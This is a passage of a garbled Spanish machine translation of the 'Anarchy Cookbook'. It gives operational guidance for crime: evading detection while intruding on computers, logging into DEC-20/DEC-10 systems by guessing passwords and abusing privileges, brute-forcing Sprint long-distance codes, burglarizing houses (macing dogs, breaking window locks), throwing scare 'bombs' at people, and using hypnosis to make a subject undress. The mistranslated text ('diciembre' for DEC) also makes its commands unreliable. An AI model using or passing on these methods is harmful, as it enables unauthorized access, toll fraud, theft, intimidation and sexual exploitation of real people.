Bienvenido al mundo de la piratería! Nosotros, las personas que viven fuera de las reglas normales, y han sido despreciados e incluso detenidos por las del "mundo civilizado", son cada vez más escasa cada día. Esto se debe a la mayor temor de lo que un buen hacker (habilidad sabio, no juicios morales aquí) se puede hacer hoy en día, lo que provoca el sentimiento anti-hacker en las masas. Además, los hackers pocos parecen saber realmente acerca de los sistemas informáticos que piratear, o qué tipo de equipo que se ejecutará en la parte delantera, o lo que podría hacer el mal en un sistema para alertar a los 'superiores' las autoridades que supervisan el sistema. Este artículo se destina a contar algunas cosas que no deben hacer, incluso antes de llegar en el sistema. Te contaré acerca de la nueva ola de dispositivos finales delanteros de seguridad que están comenzando a ser utilizado en las computadoras. Voy a tratar de inculcar en los que una segunda identidad, que se crió en el momento de gran necesidad, para sacarte del apuro. Y, por cierto, no tomo ninguna, repito, no, la responsabilidad de lo que decimos en este y los próximos artículos.Basta ya de la mentira, a la diversión: después de iniciar sesión en tu BBS favorito, que se ve en la placa de acceso de alta un número de teléfono! Se dice que es un gran sistema de "joder con el!" Esto puede ser cierto, pero a otras personas cómo muchos van a llamar al mismo número? Por lo tanto: tratar de no llamar a un número determinado para el público. Esto es porque hay por lo menos cada otro usuario llamado, y cuántas otras tarjetas se extendió a ese número? Si usted llama a un número muy, muy lejos, y usted planea ir a través de un extensor o un vendedor nuevo, no seguir llamando al número de acceso misma (es decir como lo haría si tuviera un hacker en ejecución), esto parece muy sospechoso y puede hacer la vida imposible cuando la factura de teléfono viene en el correo. La mayoría de las ciudades tienen una gran variedad de números de acceso y servicios, a fin de utilizar tantos como puedas. Nunca confíes en un cambio en el sistema ... El 414, los idiotas, fueron sorprendidos por esta razón: cuando uno de ellos conectado al sistema, no había nada bueno allí. La próxima vez, no fue un juego

Page 60: 106652012 the Anarchy Cookbook 2000 Es

de recorrido pegado a la derecha en su camino! Se procedió a jugar dicho juego para dos personas, por ejemplo dos horas y media, mientras que Telenet se les de seguimiento! Buen trabajo, ¿no te parece? Si algo parece sospechoso, caída de la línea inmediatamente! Al igual que en, ayer! El punto que estamos tratando de transmitir es: si se utiliza un poco de sentido común, usted no conseguirá roto. Deje que los niños pequeños que no son lo suficientemente inteligente como para reconocer la trampa se rompió, tomará el calor fuera de los hackers de verdad. Ahora, digamos que usted recibe en una computadorasistema de ... Se ve muy bien, sale bien, todo parece estar bien. Bien, ahora es cuando se pone más peligroso. Usted tiene que saber que el sistema informático para saber qué no hacer. Básicamente, mantenerse lejos de cualquier cosa de comandos, copiar un archivo nuevo en la cuenta, o lo que sea! Siempre deje la cuenta en el mismo estado que ha iniciado sesión. Cambiar * nada * ... Si no es una cuenta con priv, entonces no trate de alguno de los comandos que lo requieran! Todo, sí todo, los sistemas se van a mantener los archivos de registro de lo que están haciendo los usuarios, y que se mostrará. Es como dejar caer una tarjeta de problemas en un sistema de síntesis, después de enviar a dicho operador un tono muy agradable. Pase sin una cantidad excesiva de tiempo en la cuenta de un tirón. Mantenga su llamado a la noche muy tarde, si es posible, o en horario de oficina (créanlo o no!). Se da la circunstancia de que hay más usuarios durante el horario laboral, y es muy difícil de leer un archivo de registro con 60 usuarios haciendo muchos de los comandos de cada minuto. Trate de evitar los sistemas en los que todos se conocen, no trate de engañar. Y sobre todo: no actuar como si el propietario del sistema, o son lo mejor que hay. Siempre agarra a la gente que hay cabezas se hinchan ... Hay algunos equipos front-end muy interesante en torno a la actualidad, pero primero vamos a definir los términos ... Por parte delantera, nos referimos a cualquier dispositivo que debe atravesar para llegar a la computadora real. Existen dispositivos que se realizan para derrotar a los programas de hackers, y multiplexores de edad simplemente. Para derrotar a los programas de hackers, ahora hay dispositivos que levantar el teléfono y sentarse allí ... Esto significa que el dispositivo recibe ninguna compañía, por lo que usted piense que no es un equipo en el otro extremo. La única manera que lo rodea es para detectar cuando se recogió. Si se toma después de que el anillo mismo número, entonces usted sabe que es un hacker-vencedor. Estos dispositivos toman un código de varios dígitos que te deje en el sistema. Algunos son, de hecho, bastante sofisticada hasta el punto en que también limitan el nombre de usuario es hacia abajo, de modo que sólo un nombre o conjunto de nombres puede ser inicio de sesión válidas de entrada después de que el código ... Otros dispositivos de entrada de un número de código, y luego vuelva a marcar un número pre-programado para ese código. Estos sistemas son la mejor manera de dejarlo solo, porque saben que alguien está jugando con su teléfono. Usted puede pensar ", pero sólo voy a reprogramar el dial-back". Piense de nuevo, lo estúpido que es ... Después, tienen su número, o un circuito de prueba si fueras un poco más inteligente. Si se trata de su número, tienen los huevos (si es hombre ...), si es un bucle, a continuación, se atornillan de nuevo, ya que esos lazos* se * seguimiento. En cuanto a los multiplexores ... ¡Qué Plexer se supone que debe hacer es la siguiente:El sistema puede aceptar varios usuarios. Tenemos que compartir el tiempo, así que vamos a dejar que el procesador front-end de hacerlo ... Bueno, esto es lo que hace un multiplexor. Por lo general, van a pedir algo así como "entrar a la clase" o "línea". Por lo general, está programado para un número de dos dígitos, o una palabra de cuatro letras a cinco años. Por lo general hay unas cuantas series de números que acepta, pero esos números también configurar el tipo de datos 300/1200/2400 baudios. Estos multiplexores son inconvenientes en el mejor, no por lo que preocuparse. Un poco sobre la historia de la piratería: la piratería, por mi definición, significa un gran conocimiento de un área especial. Los médicos y los abogados son hackers de una especie, por esta definición. Pero más a menudo, está siendo utilizado en el contexto informático, y por lo tanto tenemos una definición de "cualquier persona que tenga una gran cantidad de equipo o el conocimiento de las telecomunicaciones." Usted no es un hacker, porque usted tiene una lista de códigos ... Hacking, en mi definición, a continuación, ha sido en torno a sólo unos 15 años. Se inició, en qué otro lugar, pero, el MIT y las universidades donde tuvieron la informática o los departamentos de ingeniería eléctrica. Los hackers han creado algunos de los mejores lenguajes de computación, los sistemas operativos más impresionantes, e incluso llegado a hacer millones. Hackear utiliza para tener un buen nombre, cuando honestamente puede decir

Page 61: 106652012 the Anarchy Cookbook 2000 Es

"sabemos lo que estamos haciendo". Ahora que significa (en la vista del público): el 414, Ron Austin, los piratas informáticos de la NASA, los piratas informáticos Arpanet ... Todas las personas que han sido capturados, han hecho un daño, y ahora van a tener que enfrentar multas y penas. Así llegamos más allá de la basura moral, y para nuestro propósito: educar a la comunidad hacker, volver a los días cuando la gente realmente sabía algo ...

63. Hacking diciembre es por la Jolly Roger

En este artículo usted aprenderá cómo iniciar una sesión en diciembre, la sesión, y todas las cosas divertidas que hacer en el medio. Toda esta información se basa en un sistema estándar de diciembre Puesto que hay sistemas de dec 10 y 20, y estoy a favor, el 20 de diciembre, habrá más información sobre ellos en este artículo. Lo que pasa es que el 20 de diciembre también es el más común de los dos, y es utilizado por gente mucho más interesante (si sabes lo que quiero decir ...) Bueno, lo primero que quiere hacer cuando usted está recibiendo soporte de un sistema de diciembre es para averiguar el formato de los nombres de inicio de sesión. Usted puede hacer esto por ver quién está en el sistema.

Diciembre => '(el' ejecutivo 'nivel de sistema)que => Sy

sy: la abreviatura de Sy (estadísticas) y muestra el estado del sistema.Usted debe ver el formato de los nombres de inicio de sesión. Un systat por lo general viene en el siguiente formulario:

Línea de tareas de programa de usuario

Trabajo: El número de trabajo (no es importante a menos que quieras para cerrar la sesión más tarde)Línea: ¿Qué línea en la que se encuentran en (se usa para hablar con ellos ...) Estos son los números tanto de dos o tres dígitos.Programa: ¿Qué programa se ejecuta bajo? Si dice 'ejecutivo' que no están haciendo nada en absoluto ...Usuario: ahhhahhhh! Este es el nombre de usuario que se registra en menos de ... Copie el formato y el mismo truco outa código de trabajo ... Formato de inicio de sesión es como tal:

diciembre => 'que => Nombre de usuario Contraseña

Nombre de usuario es el nombre de usuario en el formato que vimos anteriormente en el SYSTAT. Después de presionar el espacio después de su nombre de usuario, se detendrá haciéndose eco de los caracteres de vuelta a su pantalla. Esta es la contraseña que usted está escribiendo pulg .. Recuerde, la gente suele usar su nombre, el nombre de su perro, el nombre de un personaje favorito en un libro, o algo así. A las personas inteligentes pocos han establecido un conjunto de claves (qwerty o asdfg). Las contraseñas pueden tener de 1 a 8 caracteres de longitud, nada después de que se ignora. Usted está finalmente pulg .. Sería bueno tener un poco de ayuda, ¿no? Sólo tienes que escribir una? O la ayuda de la palabra, y le dará toda una lista de temas ... Algunos caracteres útiles para que usted conozca serían las teclas de control, ¿no? Retroceso en el 20 de diciembre, el frotado, que es 255 en la tabla ASCII. En el 10 de diciembre es el control-H. Para abortar un listado largo o un programa, el control-C funciona bien. Utilice Control + O para detener la salida de largo a la terminal. Esto es útil cuando se juega un juego, pero no quiere salir de control-C. Control + T para la época. Control-U matará a toda la línea que está escribiendo en este momento. De forma accidental, puede ejecutar un programa en donde la única salida es un control-X, por lo que mantener en reserva. Control-s para corregir la escora, el control-Q para continuar en ambos sistemas. Es el terminal tiene problemas? Al igual, se detiene sin razón, o no lo hace retroceder la derecha? Esto es debido a que ambos sistemas son compatibles con muchos terminales, y no lo has dicho lo

Page 62: 106652012 the Anarchy Cookbook 2000 Es

que es tuyo sin embargo ... Usted está utilizando un VT05 lo que es necesario que diga que son uno.

Diciembre => 'que => terminal de información

-O-Usted => Información

(Esto muestra lo que el terminal se configura como.)Diciembre => todo tipo de mierda, entonces el `que => set ter vt05

(Esto establece el tipo de terminal a la VT05).Ahora vamos a ver lo que está en la cuenta (en este caso después de la Cuenta abreviada.) Que ha hackeado en. Di:

=> Dir(Corto para el directorio.)

Le muestra lo que el usuario del código ha guardarlo en el disco. Debe haber un formato como este: xxxxx.Oooxxxxx es el nombre del archivo, de 1 a 20 caracteres de longitud. Ooo es el tipo de archivo, una de: exe, txt, dat, bas, cmd y algunos otros que son dependientes del sistema. Exe es un programa compilado que se puede ejecutar (con tan sólo escribir su nombre en el `)

Txt es un archivo de texto, que se puede ver escribiendo:=> Tipo de xxxxx.TxtNo trate de:=> Tipo de xxxxx.EXE

(Esto es muy malo para su terminal y le dirá absolutamente nada.)

Dat son los datos que ha guardado.Bas es un programa básico, usted puede tener que escribir para usted.Comando es un archivo de tipo de comando, un poco demasiado complicado para entrar aquí. Trate de:

=> Tomar xxxxx.Cmd

Por cierto, hay usuarios que hay por ahí que pueden tener los archivos que puede utilizar.

(Vaya, ¿por qué más estoy aquí?)

=> Dir <*. *> (Dic 20)=> Dir [*, *] (Dic 10)

* Es un comodín, y le permitirá acceder a los archivos de otras cuentas si el usuario tiene que configurar el acceso del público. Si no se establece para el acceso público, entonces usted no lo verá. Para ejecutar este programa:

diciembre => 'que => nombre de usuario nombre-programa

Nombre de usuario es el directorio en el que vio el archivo que aparece debajo, y el nombre del archivo era lo que más que el nombre del archivo? ** No están solos ** recuerde, usted ha dicho (en el comienzo mismo) sy la abreviatura de SYSTAT, y la forma en que dijo que esto mostraba a los demás usuarios en el sistema? Bueno, usted puede hablar con ellos, o al menos enviar un mensaje a cualquiera que se ven en un SYSTAT. Usted puede hacer esto:

diciembre => de la lista de usuarios (de su SYSTAT)que => talkusername (Dic 20) enviar nombre de usuario (Dic 10)

Talk permite la transmisión de usted y ellos inmediatamente lo que usted / que escribe para ser enviado a la otra. Enviar sólo le permiten un mensaje para ser enviado, y enviar, se enviará de nuevo a usted, con la charla que sólo puede seguir adelante. Por

Page 63: 106652012 the Anarchy Cookbook 2000 Es

cierto, usted puede notar con el comando habla de que lo que escribe todavía se actúa sobre el analizador (programa de control). Para evitar el error constante de tipo de mensajes ya sea:

que =>; su mensajeque => rem su mensaje

el punto y coma le dice al intérprete que lo que sigue es sólo un comentario. Rem es la abreviatura de 'observación' y hace caso omiso de que a partir de entonces hasta que escriba un control-Z o el control-C, momento en el que te pone de nuevo en el modo exec. Para romper la conexión de un tipo de comando charla:

que => priv descanso de:

Si le sucede que tiene privs, usted puede hacer todo tipo de cosas. En primer lugar, usted tiene que activar esos privs.

Usted => enable

Esto le da un aviso $, y te permite hacer esto: lo que usted puede hacer a su propio directorio ahora se puede hacer para cualquier otro directorio. Para crear un nuevo Acct. Usando sus privs, sólo tienes que escribir:

=> Nombre de usuario de construcción

Si es viejo nombre de usuario, puede editar, si es nuevo, se puede definir que es lo que usted desee. Privacidad no significa nada para un usuario con privs. Por cierto, hay varios niveles de privs: Operador, rueda, de la CIA. Rueda es el más poderoso, siendo que él puede conectarse desde cualquier lugar y tener sus poderes. Los operadores tienen el poder porque están en un terminal especial que les permita a los privs. Cía es la abreviatura de "acceso a la información confidencial", lo que permite una cantidad bajo nivel de privs. Pero no se preocupe, ya que se puede leer el archivo de registro del sistema, que también tiene las contraseñas de todas las demás cuentas.Para desactivar el privs, escriba:

que => desactivar

cuando se han jugado su corazón codicioso, usted puede finalmente salir de lasistema con el comando:

=> Cierre de sesión

Esto registra el trabajo que usted está usando la alimentación del sistema (puede haber varients de este como kjob o killjob.)

64. Las bombas en inofensivas por el Jolly Roger

Para todos aquellos que no desean causar daño físico a sus víctimas, pero el terror sólo. Estas son las armas que deben utilizarse en lugares altos.

1. La bomba de harinaTome una toalla de papel húmeda y se vierte una cantidad determinada de harina para

hornear en el centro. A continuación, concluir y poner en una banda de goma para no perder la cabeza. Cuando lo tiré volarán bien, pero cuando llega, que cubre a la víctima con la flor o hace una bocanada grande de harina que se ponga a la víctima en el terror ya la medida de lo que se refiere, un poco de polvo blanco extraño es todo sobre ellos. Este es un método barato de terror y por sólo el costo de un rollo de toallas de papel y una bolsa de harina de usted y sus amigos puede tener un montón de diversión viendo la gente huye presa del pánico.

2. El humo del proyectil bomba

Page 64: 106652012 the Anarchy Cookbook 2000 Es

Todo lo que necesitas es un montón de esas bombas de humo redondo y un cohete de la muñeca o de cualquier tiro de honda. Dispara a las bombas de humo y ver el terror, ya que creo que va a explotar!

3. Huevos podridos (los buenos) Tome unos huevos y obtener una aguja y hacer un agujero pequeño en la parte superior de

cada uno de ellos. Luego deje que ellos se sientan en un lugar cálido durante aproximadamente una semana. Entonces usted tiene un montón de huevos podridos que sólo huelen cuando llegan.

4. Resplandor en la oscuridad TerrorTome uno de esos tubos de brillar en la materia oscura y se vierte el material en lo

que quieras lanzar y cuando se pone a la víctima, que piensan que es alguna sustancia química mortal o una sustancia radiactiva para que se ejecute en pánico total. Esto funciona especialmente bien con las bombas de flores ya que una sustancia pegajosa y brillante se pone todo a la víctima.

5. Pánico fizzlingTome un holgado de una solución de bicarbonato de sodio en agua y sellarlo. (Asegúrese de que no hay aire en el mismo puesto que la solución se forma un gas y no desea que aparezca en la que.) A continuación, ponerlo en una bolsa grande de plástico y llenarla con vinagre y sellarlo. Cuando es lanzado, las dos sustancias se mezclan y causar una sustancia violentamente saliendo a ir todo sobre la víctima.

65. Breaking Into Casas por The Jolly Roger

Bien que usted necesita:1. Tear Gas o Mace2. Una pistola de balines / Pellet3. Un punzón4. Guantes gruesos

Lo que haces es:

1. Llame al timbre de la casa, o un anillo, para saber si están en casa.2. Si no estás en casa entonces ...3. Saltar por encima de la cerca o caminar a través de la puerta (lo que sea).4. Si usted ve a un perro le da la maza o gas lacrimógeno.5. Ponga los guantes!!!6. Dispara a la pistola de aire comprimido ligeramente por encima de las cerraduras de

la ventana.7. Empuje el picahielo a través del orificio (hecho por el rifle de aire comprimido).8. Introduzca ventana.9. PRIMERA ... encuentra el salón. (Hay cosas interesantes allí).10. Ve a la habitación para conseguir una funda de almohada. Coloque los objetos

valiosos en la caja de la almohadilla.11. Salir <- FAST *! - *>

Notas: Usted debe tener ciertos objetivos trabajado también <- * NUNCA * -> Robo de su propio barrio (como las computadoras, radios, ect.). Si usted piensa que tiene una alarma ... <- * ¡Olvídalo! * ->.

66. Una guía para Hipnotismo por la Jolly Roger

¿Qué es la hipnosis?Hipnotismo, contrariamente a la creencia común, no es más que el estado en que tu mente y cuerpo están en un estado de relajación y su mente está abierta a las influencias positivas o negativas inteligentemente redactada,. No es un trance en el que:

• Son totalmente influenciable.• No se puede mentir.• Un sueño que no se puede despertar sin ayuda.

Esto puede reducir su esperanza de algo, pero, el hipnotismo es un de gran alcance para la autoayuda, y / o daño.

Page 65: 106652012 the Anarchy Cookbook 2000 Es

Su mente subconscienteAntes de entrar en el más allá, me gustaría decir que el hipnotismo no sólo es grande en la forma en que te relaja y te da (en el largo plazo) lo que quiere, sino que también aprovecha una fuerza de increíble poder, que creen o no, este poder es su mente subconsciente. La mente subconsciente siempre sabe lo que está pasando con cada parte de tu cuerpo, cada momento del día. Te protege de las influencias negativas, y conserva el poder para frenar los latidos del corazón hacia abajo y cosas por el estilo. La mente subconsciente tiene casi toda la información que le gustaría saberAcerca de sí mismo, o, en este caso, la persona se le hipnotiza. Hay muchas maneras de hablar a su subconsciente y hacer que hablar con usted. Una de ellas es la junta Ouja, no, no su espíritu, se limita a las mentes de aquellos que lo están utilizando. Otra, que voy a discutir aquí, es el método del péndulo. OK, aquí es cómo va. En primer lugar, conseguir un anillo o una lavadora y lo ate a un tema un poco más de la mitad de su antebrazo. Ahora, tome una hoja de papel y dibujar un gran círculo en el mismo. En el gran círculo que ahora hay que trazar una cruz (a + grande). Ahora, ponga la hoja de papel sobre una mesa. A continuación, sujete el hilo con el anillo o arandela en él y lo coloca (sujeta el hilo de manera que el anillo es de 1 pulgada por encima del papel de movimientos de balanceo) en el centro de la cruz. Ahora, mueva el hilo de manera que la arandela sube y baja, dígase a sí mismo la palabra "Sí", ahora, hágalo de lado a lado y decir la palabra "no". No en sentido antihorario y decir "no sé". Y por último, ¿hacia la derecha y decir: "No quiero decir." Ahora, con la parte posterior de hilos en el medio de la cruz, hacerse preguntas y esperar a que el péndulo oscile en la dirección de la respuesta. (Sí, no, yo no sé o no quiero decir ...). Pronto, para su asombro, se estará respondiendo a preguntas como cualquier cosa ... Que la respuesta del péndulo, no intente .. Cuando lo intentas nunca obtendrá una respuesta. Deje que la respuesta vendrá a ti.

Cómo inducir la hipnosisAhora que sabe cómo hablar a su mente subconsciente, ahora le dirá cómo guiar a alguien a la hipnosis. Tenga en cuenta que dicha guía, nunca se puede, hipnotizar a alguien, ellos deben estar dispuestos. Bueno, el tema debe estar sentado o acostado en una posición cómoda, relajada, y en un momento cuando las cosas no van a ser interrumpido. Dígales que el siguiente o algo cerca de ella, en un tono apacible y monótona (no es un tono de mando de la voz)

Nota: Enciende una vela y colóquela en algún lugar donde pueda ser visto fácilmente.

"Tome una respiración profunda por la nariz y mantenerla en una cuenta de 8. Ahora, a través de la boca, exhale por completo y poco a poco. Continúa respirando respiraciones largas, profundas, a través de la nariz y exhalando por la boca. Tiempo de seguridad de todos los músculos muy apretado, ahora, a contar desde diez a uno, ponerlos en libertad poco a poco, se encuentran muy relajados. Ahora, mira la vela, como se mire, con cada respiración y pasar momento, usted se está sintiendo cada vez más y más pacífico y relajado. La llama velas es tranquilo y luminoso. como se mire voy a contar a partir de 100 hacia abajo, como una cuenta, sus ojos se vuelven más y más relajado, cada vez más y más cansado con cada momento que pasa. " Ahora, la cuenta regresiva de 100, más o menos cada 10 números dicen "Cuando llego a xx tus ojos (o se encuentran sus ojos) son cada vez más cansado." Dígales que pueden cerrar los ojos cada vez que les da la gana. Si los ojos de personas todavía están abiertas al llegar a 50 a continuación, en lugar de decir "sus ojos se .." Decir "los ojos son ...". Cuando sus ojos están cerrados decir lo siguiente. A medida que se encuentran (o se sienta) aquí con los ojos convenientemente cerca te encuentras relajarse más y más con cada momento y la respiración. La relajación es agradable y feliz así, felizmente dar paso a este maravilloso sentimiento. Imagínate a ti mismo en una nube, descansando en paz, con una ligera brisa acariciando su cuerpo. Una sensación de cosquilleo comienza a trabajar a su manera, dentro y fuera de sus dedos del pie, que se mueve lentamente a sus pies, lo que les caliente, pesado y relajado. La nube es suave y es compatible con su cuerpo, con su suave textura, la escena es tranquila y absorbente, la tranquilidad te absorbe por completo. El cosquilleo suave y lentamente se mueve hacia arriba las piernas, relajarlos. Hacerlos caliente y pesado. La relajación se siente muy bien, se siente tan bien para relajarse y dejarse llevar. A medida que el hormigueo continúa su viaje hasta en su plexo solar, se siente el estómago interno llegar a ser muy relajado. Ahora, se

Page 66: 106652012 the Anarchy Cookbook 2000 Es

mueve lentamente hacia el pecho, haciendo que su respiración relajada también. La sensación comienza a moverse hacia arriba los brazos a los hombros, haciendo que los brazos pesados y se relajan también. Usted es consciente de la relajación total que está experimentando en la actualidad, y dar paso a la misma. Es bueno y pacífico, el hormigueo se mueve ahora en su cara y la cabeza, relajando las mandíbulas, el cuello y los músculos faciales, por lo que sus cuidados y preocupaciones se alejan flotando. Lejos en el cielo azul a medida que descansar felizmente en la nube. Si no responden o que piensan que (él o ella) se va a dormir, a continuación, añadir en un "... siempre concentrándose en mi voz, haciendo caso omiso de todos los demás sonidos. A pesar de que otros sonidos que existe, que le ayudará en su descanso ... " Pronto se dejó escapar un suspiro, como si estuvieran dejando ir, y su cara debe tener una "fibrosidad" a ella, convirtiéndose en rasgos ... Ahora bien, decir lo siguiente "... Ahora te encuentras en un pasillo, el pasillo es tranquilo y agradable. Al contar con 10 a 1 que se imagina a sí mismo caminando más y más por el pasillo. Cuando llego a una se encuentra mismo en el que desea ser, en otro, un mayor estado de conciencia y la mente. (contar de diez a uno) ... " Haga esto unas tres o cuatro veces. Entonces, para probar si el sujeto está bajo hipnosis o no, diga "... Se siente una sensación extraña en su (el brazo que escriben con) el brazo, la sensación comienza a los dedos y lentamente se mueve hacia arriba el brazo, ya que se mueve a través el brazo de su brazo se convierte más y más ligero, que pronto será tan ligero que se ... cada vez más y más ligero que cada respiración y el momento ... " Sus dedos deben comenzar a temblar y luego moverse hacia arriba, el siguiente el brazo, ahora mi amigo, usted tiene él / ella en la hipnosis. La primera vez que lo hace, mientras que él / ella es menor de decir cosas buenas, como: "Tu vas a sentir gran mañana" o "Todos los días en todos los sentidos que se encontrará cada vez mejor y mejor" .. ¿O alguna mierda así ... Cuanto más se hunden, cuanto más profundo en la hipnosis, que recibirán cada vez que lo haga.

¿Qué hacer cuando hipnotizadoCuando los tengas en virtud de que las cosas deben de palabras con mucho cuidado para salirse con la suya. Usted no puede simplemente decir ... Quítate la ropa y coger la almohada. No, eso no haría el truco. Usted debe decir algo como .... "A encontrar su auto en casa, en tu habitación y tienes que tomar una ducha (describen vívidamente su habitación y lo que esté sucediendo), se empieza a quitarse la ropa ..." Ahora bien, no puede ser así de simple, debe conocer la casa de las personas, la habitación y aseo con ducha. A continuación, describe vívidamente las cosas y les digo que lo representen (que tienen que ser profundamente bajo para hacer esto). Sólo quiero sugerir que experimentar un tiempo, y conocer cómo hacer las cosas.

El despertarEl despertar es muy fácil, basta con decir: "... como contar del 1 al 5 que se encontrará cada vez más y más despierto, más y más animado. Cuando se despierte se encontrará completamente vivo, despierto y fresco. Mental y físicamente, al recordar la agradable sensación de que la hipnosis trae ... El despertar sensación de que un bebé recién nacido, que ha renacido con la vida y el vigor, la excelente sensación. Recordar que la próxima vez que introduzca la hipnosis se convertirá en un estado cada vez más profundo y más profundo que antes.

1. Usted se siente por supuesto energía a través de sus miembros.2. Usted comienza a respirar profundamente, revolviendo.3. Comienza a moverse más y más los ojos abiertos, que le llevará a plena conciencia.4. Usted está arriba, arriba, arriba y despertando más y más.5. Usted está despierto y gran sentimiento.

Y eso es todo! Ahora ya sabe cómo hipnotizar a sí mismo ya otra persona.Usted aprenderá más y más a medida que experimento.

67. El mando de edición Informador # 1 por Tracker y Noman Bates

IntroducciónBienvenido a la primera edición de 'El Informador remoto! Este boletín es el lector compatible. Si los lectores de este boletín de noticias no ayudan a apoyar a él,

Page 67: 106652012 the Anarchy Cookbook 2000 Es

entonces va a terminar. Estamos poniendo esto para ayudar a los que les gustaría leerlo. Si usted es uno de los que piensan que lo saben todo, entonces no se moleste en leerlo. Este boletín no es nada parecido a los problemas futuros. Los números futuros contendrá varias secciones, siempre que la entrada se obtiene lector. A continuación se muestra una visión general de esquema de las secciones en las futuras ediciones.

E / S de la Junta (entrada / salida de la Junta)

La Junta de E / S es para las preguntas que tenga, para que podamos ser capaces de responder o al menos que se refieren a algo o alguien. Vamos a ser honestos, si no podemos ayudarle. No vamos a hacer algo, o para el efecto, sólo para hacer que parezca que usted contestó. Habrá una sección en la Junta de E / S para las preguntas que no podemos contestar, a continuación, los lectores tendrán la oportunidad de responder a ella. Vamos a imprimir todo lo que es razonable en el boletín de noticias, incluso las quejas si usted siente que son mejores que todo el mundo.

Centro de Noticias

Esta sección será para noticias de todo el mundo terrenal. Se hablará de los bustos de personas en el mundo terrenal y todo lo que se considera noticia. Si usted encuentra artículos en el periódico, o algo que sucede en su área local, escriba, y subirlo a una de las tablas que figuran al final del boletín. El mango se colocará en el artículo. Si no introduce un artículo de noticias, por favor, indique la fecha y desde donde usted lo consiguió.

Característica Sección

La sección del enfoque será el más grande de las secciones, ya que será sobre el tema que aparece en esta cuestión. Esto será en gran medida comentarios de los lectores que se enviará en entre los temas. Al final de la cuestión que nos ocupa, se le dirá al tema de la próxima edición, por lo tanto, si usted tiene algo que aportar, entonces usted tendrá tiempo suficiente para preparar su artículo.

Hardware / Software Review

En esta sección, vamos a revisar los puntos buenos y malos de hardware y software relacionado con el inframundo. Será una extensa revisión, en lugar de sólo un pequeño párrafo.

Los Tops

Esta sección será el área donde el BBS del hampa mejores mujeres, programas de hacking, escáneres, etc módem será mostrado. Este lector se seleccionan y no se verá alterado de ninguna manera. Los temas que se enumeran a continuación.

• Underworld BBS (Hack, Phreak, tarjeta, anarquía, etc)• Programas de hacking para compatables Hayes• Programas de hacking para 1030/Xm301 módems• Escáneres de módem para compatables Hayes• Escáneres de módem para 1030/Xm301 módems• Otros programas de tipo ilegal• Usted puede agregar temas a la lista si lo suficiente va a apoyar.

Tid Bits

Este contendrá consejos e información útil enviados por los usuarios. Si usted tiene cualquier información que usted desea contribuir, a continuación, ponerlo en un archivo de texto y subirlo a uno de los BBS es que aparece al final del boletín. Por favor, no los códigos de larga distancia, las contraseñas de mainframe, etc Podemos añadir otras secciones como pasa el tiempo. Este boletín no se pondrán a cabo sobre una base regular. Se apagó cuando tenemos suficientes artículos e información para poner en él. No puede ser de hasta 5 un mes, pero siempre habrá al menos una de un mes. Nos gustaría que los lectores, que nos envíe cualquier cosa que usted cree sea de interés para

Page 68: 106652012 the Anarchy Cookbook 2000 Es

otros, como indicios de hacking, los métodos de piratería compañías de larga distancia, compañías de tarjeta de, etc Vamos a mantener el boletín de noticias mientras que los lectores apoyan él. Ese es el final de la introducción, pero echa un vistazo a este boletín, ya que contiene información que puede ser de valor para usted.

Hacking Sprint: La Manera Más FácilSi hackear EE.UU. Sprint, 950-0777 (por cierto ya no es GTE Sprint), y se sienten frustrados por la piratería de varias horas sólo para encontrar uno o dos códigos, entonces sigue estos consejos, además de aumentar enormemente sus resultados. En primer lugar, una cosa que Mr. Mojo demostrado es que Sprint no almacenar más de un código de cada cien números. (Por ejemplo: 98765400 hasta 98765499 puede contener sólo un código). Puede que no haya un código en que cien, pero nunca habrá más de uno. 9 códigos de dos dígitos de Sprint se almacenarán a partir 500000000 y 999999999. En el comienzo de 950 Sprint del puerto, que sólo tenían códigos de 8 dígitos. Luego comenzaron a convertir a 9 códigos de dos dígitos, el almacenamiento de todos los códigos de 8 dígitos entre 10000000 y 49999999, y los 9 dígitos de los códigos entre 500000000 y 999999999. Sprint ha cancelado la mayoría de los códigos de 8 dígitos, aunque hay pocos que quedan que se han denotado como los códigos de prueba. De vez en cuando, me entero de phreaks diciendo que tienen códigos de 8 dígitos, pero cuando ellos la verificación de los códigos no son válidos. Ahora bien, ¿por dónde empezar? Usted ya ha reducido el número de altas y bajas a la mitad, por lo tanto, ya está aumentando sus posibilidades de buenos resultados en un 50 por ciento. El siguiente paso es encontrar un prefijo buena para cortar. Por cierto, un prefijo, en términos de hacking, es los primeros dígitos en un código que puede ser de cualquier longitud, excepto el mismo número de dígitos es el código. (Por ejemplo: 123456789 es un código que significa 1, 12, 123, 1234, 12345, 123456, 1234567 y 12345678 son prefijos.) La forma en que encontrar un prefijo buena para hackear es para introducir manualmente un prefijo de código. Si al introducir el prefijo y un número de destino válido y no se oye el sonido de la grabación que le dice que el código es válido hasta casi el final del número, entonces usted sabe que el prefijo es válida. Aquí está una carta a seguir para hacer esto:

Código - rango de destino los códigos existen buenas-------------------------------------------------123456789 - 6192R 123400000-123499999123456789 - 619267R 123450000-123459999123456789 - 61926702R 123456000-123456999123456789 - 6192670293R 123456700-123456799-------------------------------------------------(R - Indica al ring para iniciar la grabación)

Para probar esta verdad, me encontré con una prueba con OmniHack 1.3p, escrito por Jolly Joe. En esta prueba me encontré con un prefijo de donde los últimos 3 dígitos eran todo lo que tenía que cortar. He probado cada cien del prefijo de 6 dígitos para encontrar que todos menos cuatro tenían al comienzo del anillo después de la cuarta cifra se ha marcado en el número de destino. Los otros cuatro no sonó hasta que hubiera terminado todo el código. Me puse OmniHack de hackear el prefijo + 00 + 99 hasta el prefijo. (Por ejemplo: xxxxxxy00 de xxxxxxy99:. Donde y es uno de los cuatro números que el anillo no se iniciaron hasta que la marcación se completó) El uso de este método, me encontré con cuatro códigos de un total de 241 intentos de hacking usando ascendente (También conocido como: secuencial) . A continuación podrás ver un registro de mi espalda:

Rango de hack Códigos encontrado Trataxxxxxx300 - xxxxxx399 xxxxxx350 50xxxxxx500 - xxxxxx599 xxxxxx568 68xxxxxx600 - xxxxxx699 xxxxxx646 46xxxxxx800 - xxxxxx899 xxxxxx877 77Totales 4 códigos 241

Como se ve, estos métodos de trabajo. Siga estas instrucciones y consejos, y usted debe tener un aumento en la producción de códigos en el Sprint de hacking en el futuro.

Page 69: 106652012 the Anarchy Cookbook 2000 Es

Además, si usted tiene alguna pista o consejo piensa que otras personas podrían beneficiarse de, a continuación, se escriben y subirlos a una de las tablas al final del boletín.

